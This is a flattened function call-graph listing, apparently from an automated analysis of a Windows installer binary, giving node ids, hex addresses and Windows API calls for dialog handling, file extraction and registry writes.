LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 